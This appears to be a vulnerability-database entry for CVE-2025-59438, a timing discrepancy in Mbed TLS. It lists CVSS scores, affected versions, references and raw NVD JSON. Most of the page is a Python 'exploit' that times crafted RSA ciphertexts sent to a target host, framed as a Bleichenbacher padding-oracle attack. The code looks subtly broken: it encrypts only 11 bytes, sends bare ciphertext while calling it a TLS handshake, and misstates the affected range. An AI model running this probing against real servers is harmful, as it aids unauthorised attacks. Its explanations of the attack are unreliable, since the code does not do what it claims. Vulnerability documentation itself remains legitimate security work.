CVE-2025-59438

Description

Mbed TLS through 3.6.4 has an Observable Timing Discrepancy.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:* - VULNERABLE

Mbed TLS <= 3.6.4

Mbed TLS 3.6.x (3.6.0 - 3.6.4)

Mbed TLS 3.5.x 及更早版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-59438 - Mbed TLS RSA PKCS#1 v1.5 Timing Side-Channel PoC
# This PoC demonstrates a Bleichenbacher-style timing attack against Mbed TLS < 3.6.4
# to exploit Observable Timing Discrepancy in RSA PKCS#1 v1.5 padding validation.

import socket
import time
import statistics
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5
import os

TARGET_HOST = "target.example.com"
TARGET_PORT = 443
SAMPLES_PER_TEST = 5000
TIMING_THRESHOLD_NS = 50000  # 50 microseconds threshold to distinguish valid/invalid padding

def generate_random_ciphertexts(public_key, count):
    """Generate random ciphertexts for timing measurement."""
    ciphertexts = []
    key_size = public_key.size_in_bytes()
    for _ in range(count):
        # Generate random plaintext that may or may not have valid PKCS#1 v1.5 padding
        plaintext = b'\x00\x02' + os.urandom(key_size - 2)
        cipher = PKCS1_v1_5.new(public_key)
        ct = cipher.encrypt(plaintext[:11])  # Only encrypt first 11 bytes (rest is padding)
        ciphertexts.append(ct)
    return ciphertexts

def measure_timing(host, port, ciphertext):
    """Send ciphertext to target and measure response time."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(5)
    try:
        sock.connect((host, port))
        # Send TLS handshake with our crafted RSA ciphertext
        start_time = time.time_ns()
        sock.send(ciphertext)
        response = sock.recv(4096)
        end_time = time.time_ns()
        return end_time - start_time
    except socket.timeout:
        return None
    finally:
        sock.close()

def analyze_timings(timings):
    """Analyze timing measurements to detect padding oracle."""
    valid_times = [t for t in timings if t is not None]
    if len(valid_times) < 100:
        return None
    mean = statistics.mean(valid_times)
    stdev = statistics.stdev(valid_times)
    # Detect outliers that indicate valid padding (longer processing time)
    outliers = [t for t in valid_times if t > mean + 2 * stdev]
    return {
        "mean_ns": mean,
        "stdev_ns": stdev,
        "outlier_count": len(outliers),
        "outlier_ratio": len(outliers) / len(valid_times)
    }

def exploit_timing_oracle(host, port, public_key):
    """Main exploit function for Bleichenbacher-style timing attack."""
    print(f"[*] Starting timing attack against {host}:{port}")
    print(f"[*] Target RSA key size: {public_key.size_in_bits()} bits")

    ciphertexts = generate_random_ciphertexts(public_key, SAMPLES_PER_TEST)
    timings = []

    for i, ct in enumerate(ciphertexts):
        t = measure_timing(host, port, ct)
        timings.append(t)
        if (i + 1) % 500 == 0:
            print(f"[*] Collected {i + 1}/{SAMPLES_PER_TEST} timing samples")

    result = analyze_timings(timings)
    if result and result['outlier_ratio'] > 0.01:
        print(f"[!] Timing oracle detected!")
        print(f"    Mean: {result['mean_ns']} ns, StdDev: {result['stdev_ns']} ns")
        print(f"    Outlier ratio: {result['outlier_ratio']:.4f}")
        print("[!] Vulnerability CVE-2025-59438 is exploitable on this target.")
    else:
        print("[-] No significant timing difference detected. Target may be patched.")

if __name__ == "__main__":
    # Load target's RSA public key (e.g., from TLS certificate)
    # public_key = RSA.import_key(open("target_cert.pem").read())
    # exploit_timing_oracle(TARGET_HOST, TARGET_PORT, public_key)
    print("[*] PoC for CVE-2025-59438 - Configure target and public key before running")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59438
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59438
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59438/
[4] VulDB https://vuldb.com/cve/CVE-2025-59438
[5] https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-10-invalid-padding-error/
[6] https://mbed-tls.readthedocs.io/en/latest/tech-updates/security-advisories/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59438", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:39.103", "lastModified": "2025-10-23T12:35:35.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mbed TLS through 3.6.4 has an Observable Timing Discrepancy."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-208"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.5", "matchCriteriaId": "D9DA7861-39B5-40B3-BF4F-6A79ED188844"}]}]}], "references": [{"url": "https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-10-invalid-padding-error/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://mbed-tls.readthedocs.io/en/latest/tech-updates/security-advisories/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}